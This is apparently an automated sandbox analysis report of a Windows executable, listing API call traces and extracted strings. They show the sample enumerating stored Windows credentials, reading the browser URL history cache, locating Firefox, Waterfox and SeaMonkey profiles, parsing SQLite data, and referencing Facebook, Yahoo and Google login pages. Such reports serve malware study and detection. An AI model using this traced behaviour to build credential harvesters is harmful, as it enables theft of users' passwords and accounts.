                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: File$CloseHandle$CreateProcess$CurrentTempView$??2@ChangeDirectoryDuplicateFindInformationMappingNameNotificationOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                • String ID: bhv
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?), ref: 0040E093
                                                                                • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                • DuplicateHandle.KERNEL32(?,?,00000000), ref: 0040E0BF
                                                                                • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,?), ref: 0040E113
                                                                                • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E12E
                                                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E13E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E143
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileHandle$Close$ProcessView$CreateCurrentDuplicateMappingOpenSizeUnmapWrite
                                                                                • String ID: bhv
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                  • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                • wcschr.MSVCRT ref: 0040C324
                                                                                • wcschr.MSVCRT ref: 0040C344
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                • String ID: visited:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: _initterm$HandleModule__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                                                                • String ID: hlD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                • memcpy.MSVCRT ref: 0040B60D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                • String ID: AE$BIN
                                                                                • API String ID: 1668488027-3931574542
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • CreateFileA.KERNEL32(?,?,00000003,00000000,?,?,00000000), ref: 0041846F
                                                                                • GetLastError.KERNEL32(0040EAB3), ref: 0041847E
                                                                                Strings
                                                                                • cannot detach database %s, xrefs: 0042F939
                                                                                • no such database: %s, xrefs: 0042F92A
                                                                                • database %s is locked, xrefs: 0042F987
                                                                                • cannot DETACH database within transaction, xrefs: 0042F946
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFile$ErrorLast
                                                                                • String ID: cannot DETACH database within transaction$cannot detach database %s$database %s is locked$no such database: %s
                                                                                • API String ID: 3733516855-3374617522
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                • memset.MSVCRT ref: 0040BC75
                                                                                • memset.MSVCRT ref: 0040BC8C
                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                • memcmp.MSVCRT ref: 0040BCD6
                                                                                • memcpy.MSVCRT ref: 0040BD2B
                                                                                • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$ByteChangeCharCloseFileFindFreeLocalMultiNotificationSizeWide_wcsicmpmemcmpmemcpy
                                                                                • String ID:
                                                                                • API String ID: 509814883-3916222277
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                • GetLastError.KERNEL32 ref: 0041847E
                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041848B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: CreateFile$??3@ErrorLast
                                                                                • String ID: |A
                                                                                • API String ID: 1407640353-1717621600
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                • String ID: r!A
                                                                                • API String ID: 2791114272-628097481
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1AE
                                                                                  • Part of subcall function 0040B1AB: ??3@YAXPAX@Z.MSVCRT ref: 0040B1B6
                                                                                  • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                                                  • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                  • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                  • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                  • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                  • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                  • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                  • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                  • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                • _wcslwr.MSVCRT ref: 0040C817
                                                                                  • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                  • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                • wcslen.MSVCRT ref: 0040C82C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$??3@$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                • API String ID: 62308376-4196376884
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 0040A824
                                                                                • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                • wcscpy.MSVCRT ref: 0040A854
                                                                                • wcscat.MSVCRT ref: 0040A86A
                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                • String ID: C:\Windows\system32
                                                                                • API String ID: 669240632-2896066436
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                  • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                • wcslen.MSVCRT ref: 0040BE06
                                                                                • _wcsncoll.MSVCRT ref: 0040BE38
                                                                                • memset.MSVCRT ref: 0040BE91
                                                                                • memcpy.MSVCRT ref: 0040BEB2
                                                                                • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                • wcschr.MSVCRT ref: 0040BF24
                                                                                • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$CredEnumerateFreeLocal_wcsncoll_wcsnicmpmemcpymemsetwcschrwcslen
                                                                                • String ID:
                                                                                • API String ID: 3191383707-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID: #@B$@ $JRA$JRA$SQLite format 3
                                                                                • API String ID: 1475443563-938593540
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403CBF
                                                                                • memset.MSVCRT ref: 00403CD4
                                                                                • memset.MSVCRT ref: 00403CE9
                                                                                • memset.MSVCRT ref: 00403CFE
                                                                                • memset.MSVCRT ref: 00403D13
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403DDA
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Waterfox$Waterfox\Profiles
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403E50
                                                                                • memset.MSVCRT ref: 00403E65
                                                                                • memset.MSVCRT ref: 00403E7A
                                                                                • memset.MSVCRT ref: 00403E8F
                                                                                • memset.MSVCRT ref: 00403EA4
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 00403F6B
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403FE1
                                                                                • memset.MSVCRT ref: 00403FF6
                                                                                • memset.MSVCRT ref: 0040400B
                                                                                • memset.MSVCRT ref: 00404020
                                                                                • memset.MSVCRT ref: 00404035
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                • memset.MSVCRT ref: 004040FC
                                                                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                • memset.MSVCRT ref: 004033B7
                                                                                • memcpy.MSVCRT ref: 004033D0
                                                                                • wcscmp.MSVCRT ref: 004033FC
                                                                                • _wcsicmp.MSVCRT ref: 00403439
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.654150838.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.654305427.0000000000459000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654315665.000000000045D000.00000040.00000001.sdmp
                                                                                • Associated: 00000003.00000002.654324467.0000000000473000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                • String ID: $0.@
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • FindFirstUrlCacheEntryW.WININET(visited:,?,?), ref: 0040C30D
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,?), ref: 0040C369
                                                                                • GetLastError.KERNEL32 ref: 0040C373
                                                                                • FindNextUrlCacheEntryW.WININET(?,?,?), ref: 0040C39F
                                                                                • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000001.650151435.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000001.650532404.0000000000459000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650563628.000000000045D000.00000040.00020000.sdmp
                                                                                • Associated: 00000003.00000001.650585154.0000000000473000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: CacheFind$Entry$Next$CloseErrorFirstLast
                                                                                • String ID: visited:
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00403C09
                                                                                • memset.MSVCRT ref: 00403C1E
                                                                                  • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                • wcscat.MSVCRT ref: 00403C47
                                                                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                • wcscat.MSVCRT ref: 00403C70
                                                                                Strings
                                                                                Memory Dump Source
